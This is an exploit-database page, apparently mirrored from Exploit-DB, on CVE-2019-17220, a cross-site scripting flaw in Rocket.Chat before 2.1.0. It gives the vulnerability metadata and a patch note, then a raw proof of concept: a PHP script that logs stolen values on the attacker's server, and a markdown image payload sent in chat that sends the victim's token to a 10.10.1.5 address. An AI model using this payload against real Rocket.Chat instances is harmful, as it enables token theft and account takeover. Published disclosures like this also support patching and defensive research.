header-logo
Suggest Exploit
vendor:
Rocket.Chat
by:
3H34N
6.1
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: Rocket.Chat
Affected Version From: Rocket.Chat < 2.1.0
Affected Version To: Rocket.Chat < 2.1.0
Patch Exists: YES
Related CWE: CVE-2019-17220
CPE: a:rocket:rocket.chat
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2019

Rocket.Chat 2.1.0 – Cross-Site Scripting

Rocket.Chat version 2.1.0 is vulnerable to Cross-Site Scripting (XSS). An attacker can craft a malicious payload and send it to a victim via a chat session. When the victim opens the chat session, the malicious payload will be executed and the attacker can gain access to the victim's token which is written in logs.txt on the attacker's web server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of Rocket.Chat.
Source

Exploit-DB raw data:

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

Navigation

Suggest Exploit

Services By CQR